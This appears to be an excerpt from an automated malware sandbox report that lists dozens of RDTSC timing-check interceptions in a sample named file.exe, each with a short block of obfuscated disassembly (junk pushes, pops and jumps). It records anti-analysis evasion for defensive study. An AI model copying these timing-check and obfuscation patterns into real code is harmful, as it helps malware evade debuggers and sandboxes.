              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90365 second address: 4D9037B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3D50D0EC72h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9037B second address: 4D9037F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9037F second address: 4D903E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F3D50D0EC6Ch 0x0000000e mov dword ptr [esp], edi 0x00000011 jmp 00007F3D50D0EC70h 0x00000016 mov eax, dword ptr [75AF4538h] 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F3D50D0EC6Dh 0x00000024 jmp 00007F3D50D0EC6Bh 0x00000029 popfd 0x0000002a call 00007F3D50D0EC78h 0x0000002f pop eax 0x00000030 popad 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D903E3 second address: 4D903E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D903E9 second address: 4D90413 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [ebp-08h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 call 00007F3D50D0EC6Dh 0x00000016 pop esi 0x00000017 mov edx, 40414C64h 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90413 second address: 4D9047C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 4Ch 0x00000005 mov ax, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor eax, ebp 0x0000000d jmp 00007F3D507EA96Ch 0x00000012 nop 0x00000013 jmp 00007F3D507EA970h 0x00000018 push eax 0x00000019 jmp 00007F3D507EA96Bh 0x0000001e nop 0x0000001f jmp 00007F3D507EA976h 0x00000024 lea eax, dword ptr [ebp-10h] 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F3D507EA977h 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9047C second address: 4D90521 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 pushfd 0x00000007 jmp 00007F3D50D0EC70h 0x0000000c add eax, 14A82638h 0x00000012 jmp 00007F3D50D0EC6Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr fs:[00000000h], eax 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F3D50D0EC74h 0x00000028 add esi, 35F32098h 0x0000002e jmp 00007F3D50D0EC6Bh 0x00000033 popfd 0x00000034 popad 0x00000035 mov dword ptr [ebp-18h], esp 0x00000038 pushad 0x00000039 pushad 0x0000003a push ebx 0x0000003b pop esi 0x0000003c pushad 0x0000003d popad 0x0000003e popad 0x0000003f mov ax, dx 0x00000042 popad 0x00000043 mov eax, dword ptr fs:[00000018h] 0x00000049 jmp 00007F3D50D0EC75h 0x0000004e mov ecx, dword ptr [eax+00000FDCh] 0x00000054 pushad 0x00000055 mov esi, 1416C5C3h 0x0000005a mov edx, ecx 0x0000005c popad 0x0000005d test ecx, ecx 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F3D50D0EC6Ch 0x00000068 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90521 second address: 4D90527 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90527 second address: 4D90577 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 352261A3h 0x00000008 mov ebx, esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jns 00007F3D50D0ECC2h 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F3D50D0EC70h 0x0000001a add cx, F6E8h 0x0000001f jmp 00007F3D50D0EC6Bh 0x00000024 popfd 0x00000025 pushad 0x00000026 call 00007F3D50D0EC76h 0x0000002b pop ecx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90577 second address: 4D9059F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 add eax, ecx 0x00000008 jmp 00007F3D507EA977h 0x0000000d mov ecx, dword ptr [ebp+08h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9059F second address: 4D905BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D905BA second address: 4D905C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D905C0 second address: 4D905D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ecx, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3D50D0EC6Ah 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D905D6 second address: 4D905DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D905DC second address: 4D905E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D905E0 second address: 4D905E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D802DD second address: 4D802F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D802F8 second address: 4D8033B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 53h 0x00000005 pushfd 0x00000006 jmp 00007F3D507EA970h 0x0000000b or ecx, 302012B8h 0x00000011 jmp 00007F3D507EA96Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F3D507EA975h 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8033B second address: 4D80374 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F3D50D0EC71h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 movzx esi, di 0x00000014 push edi 0x00000015 mov cl, 86h 0x00000017 pop ebx 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80374 second address: 4D80378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80378 second address: 4D8037E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8037E second address: 4D803B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F3D507EA96Eh 0x00000008 pop ecx 0x00000009 push edx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e sub esp, 2Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F3D507EA978h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D803B2 second address: 4D8044A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F3D50D0EC74h 0x00000011 sbb ah, FFFFFFC8h 0x00000014 jmp 00007F3D50D0EC6Bh 0x00000019 popfd 0x0000001a pushfd 0x0000001b jmp 00007F3D50D0EC78h 0x00000020 sub eax, 43A35828h 0x00000026 jmp 00007F3D50D0EC6Bh 0x0000002b popfd 0x0000002c popad 0x0000002d push eax 0x0000002e jmp 00007F3D50D0EC79h 0x00000033 xchg eax, ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F3D50D0EC78h 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8044A second address: 4D80459 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D507EA96Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80459 second address: 4D80497 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F3D50D0EC6Ch 0x00000011 sbb cl, 00000078h 0x00000014 jmp 00007F3D50D0EC6Bh 0x00000019 popfd 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80497 second address: 4D8049D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8049D second address: 4D804B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 mov ecx, edi 0x0000000a mov edx, 31819DC0h 0x0000000f popad 0x00000010 xchg eax, edi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov edi, eax 0x00000016 mov bx, cx 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D804DB second address: 4D804DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D804DF second address: 4D804E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D805F8 second address: 4D80665 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007F3D507EA978h 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F3D507EA96Ah 0x0000001a xor eax, 2F1BFBC8h 0x00000020 jmp 00007F3D507EA96Bh 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007F3D507EA978h 0x0000002c sbb ch, 00000028h 0x0000002f jmp 00007F3D507EA96Bh 0x00000034 popfd 0x00000035 popad 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80725 second address: 4D80746 instructions: 0x00000000 rdtsc 0x00000002 mov bx, 6220h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov ebx, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3D50D0EC71h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80746 second address: 4D8074C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8074C second address: 4D80752 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80752 second address: 4D807D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-2Ch] 0x0000000b jmp 00007F3D507EA972h 0x00000010 xchg eax, esi 0x00000011 jmp 00007F3D507EA970h 0x00000016 push eax 0x00000017 pushad 0x00000018 mov dx, BDA4h 0x0000001c jmp 00007F3D507EA96Dh 0x00000021 popad 0x00000022 xchg eax, esi 0x00000023 pushad 0x00000024 push ecx 0x00000025 pushfd 0x00000026 jmp 00007F3D507EA973h 0x0000002b sbb esi, 51FB6A6Eh 0x00000031 jmp 00007F3D507EA979h 0x00000036 popfd 0x00000037 pop eax 0x00000038 push eax 0x00000039 push edx 0x0000003a mov ah, dh 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D807D0 second address: 4D80804 instructions: 0x00000000 rdtsc 0x00000002 mov dh, ah 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 jmp 00007F3D50D0EC70h 0x0000000d mov dword ptr [esp], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F3D50D0EC77h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80804 second address: 4D8081C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3D507EA974h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8081C second address: 4D8084D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F3D50D0EC6Ch 0x0000000e mov dword ptr [esp], ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F3D50D0EC77h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8084D second address: 4D80853 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D808AA second address: 4D808B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D808B0 second address: 4D808B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D808B4 second address: 4D808C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ecx, 63339827h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D808C8 second address: 4D808CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D808CD second address: 4D808D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D808D3 second address: 4D80056 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F3DC15086E0h 0x0000000e xor eax, eax 0x00000010 jmp 00007F3D507C409Ah 0x00000015 pop esi 0x00000016 pop edi 0x00000017 pop ebx 0x00000018 leave 0x00000019 retn 0004h 0x0000001c nop 0x0000001d cmp eax, 00000000h 0x00000020 setne cl 0x00000023 xor ebx, ebx 0x00000025 test cl, 00000001h 0x00000028 jne 00007F3D507EA967h 0x0000002a jmp 00007F3D507EAADBh 0x0000002f call 00007F3D54F33C05h 0x00000034 mov edi, edi 0x00000036 pushad 0x00000037 jmp 00007F3D507EA96Dh 0x0000003c call 00007F3D507EA970h 0x00000041 jmp 00007F3D507EA972h 0x00000046 pop esi 0x00000047 popad 0x00000048 push esi 0x00000049 pushad 0x0000004a mov cx, CF03h 0x0000004e mov ecx, 2C0C585Fh 0x00000053 popad 0x00000054 mov dword ptr [esp], ebp 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007F3D507EA971h 0x0000005e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80056 second address: 4D80078 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007F3D50D0EC6Dh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 mov ax, 80C5h 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80136 second address: 4D80CFC instructions: 0x00000000 rdtsc 0x00000002 call 00007F3D507EA978h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov edx, 3B14C376h 0x0000000f popad 0x00000010 ret 0x00000011 nop 0x00000012 and bl, 00000001h 0x00000015 movzx eax, bl 0x00000018 lea esp, dword ptr [ebp-0Ch] 0x0000001b pop esi 0x0000001c pop edi 0x0000001d pop ebx 0x0000001e pop ebp 0x0000001f ret 0x00000020 add esp, 04h 0x00000023 jmp dword ptr [0064A41Ch+ebx*4] 0x0000002a push edi 0x0000002b call 00007F3D50810367h 0x00000030 push ebp 0x00000031 push ebx 0x00000032 push edi 0x00000033 push esi 0x00000034 sub esp, 000001D0h 0x0000003a mov dword ptr [esp+000001B4h], 0064CB10h 0x00000045 mov dword ptr [esp+000001B0h], 000000D0h 0x00000050 mov dword ptr [esp], 00000000h 0x00000057 mov eax, dword ptr [006481DCh] 0x0000005c call eax 0x0000005e mov edi, edi 0x00000060 pushad 0x00000061 pushfd 0x00000062 jmp 00007F3D507EA96Eh 0x00000067 sbb cx, 31E8h 0x0000006c jmp 00007F3D507EA96Bh 0x00000071 popfd 0x00000072 mov ch, F5h 0x00000074 popad 0x00000075 push ecx 0x00000076 push eax 0x00000077 push edx 0x00000078 jmp 00007F3D507EA977h 0x0000007d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80CFC second address: 4D80D02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80D02 second address: 4D80D06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80D06 second address: 4D80D31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3D50D0EC75h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80D31 second address: 4D80D71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F3D507EA976h 0x0000000f cmp dword ptr [75AF459Ch], 05h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F3D507EA977h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80D71 second address: 4D80DAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F3DC1A1C8D7h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov si, dx 0x00000015 call 00007F3D50D0EC6Fh 0x0000001a pop ecx 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80DAB second address: 4D80DB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 76301E4Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80DB5 second address: 4D80DC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80DC3 second address: 4D80DC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80DC7 second address: 4D80DCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80DCB second address: 4D80DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80DD1 second address: 4D80DD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80E36 second address: 4D80E72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D507EA96Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F3D507EA979h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F3D507EA96Ch 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80E72 second address: 4D80E78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80E78 second address: 4D80E7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80E7C second address: 4D80EB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F3D50D0EC75h 0x00000011 adc ah, 00000076h 0x00000014 jmp 00007F3D50D0EC71h 0x00000019 popfd 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80EB4 second address: 4D80EE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F3D507EA96Eh 0x0000000b sub al, FFFFFF98h 0x0000000e jmp 00007F3D507EA96Bh 0x00000013 popfd 0x00000014 popad 0x00000015 call 00007F3DC14FF600h 0x0000001a push 75A92B70h 0x0000001f push dword ptr fs:[00000000h] 0x00000026 mov eax, dword ptr [esp+10h] 0x0000002a mov dword ptr [esp+10h], ebp 0x0000002e lea ebp, dword ptr [esp+10h] 0x00000032 sub esp, eax 0x00000034 push ebx 0x00000035 push esi 0x00000036 push edi 0x00000037 mov eax, dword ptr [75AF4538h] 0x0000003c xor dword ptr [ebp-04h], eax 0x0000003f xor eax, ebp 0x00000041 push eax 0x00000042 mov dword ptr [ebp-18h], esp 0x00000045 push dword ptr [ebp-08h] 0x00000048 mov eax, dword ptr [ebp-04h] 0x0000004b mov dword ptr [ebp-04h], FFFFFFFEh 0x00000052 mov dword ptr [ebp-08h], eax 0x00000055 lea eax, dword ptr [ebp-10h] 0x00000058 mov dword ptr fs:[00000000h], eax 0x0000005e ret 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 popad 0x00000065 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80EE3 second address: 4D80EFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA08B7 second address: 4DA08CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D507EA96Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA08CA second address: 4DA0909 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 mov ecx, 36C7EF07h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 movzx eax, dx 0x00000014 call 00007F3D50D0EC75h 0x00000019 mov ah, 7Ch 0x0000001b pop ebx 0x0000001c popad 0x0000001d xchg eax, esi 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F3D50D0EC6Fh 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0909 second address: 4DA090F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA090F second address: 4DA0913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0913 second address: 4DA094C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F3D507EA96Eh 0x0000000e xchg eax, esi 0x0000000f jmp 00007F3D507EA970h 0x00000014 mov esi, dword ptr [ebp+0Ch] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F3D507EA96Ah 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA094C second address: 4DA0952 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
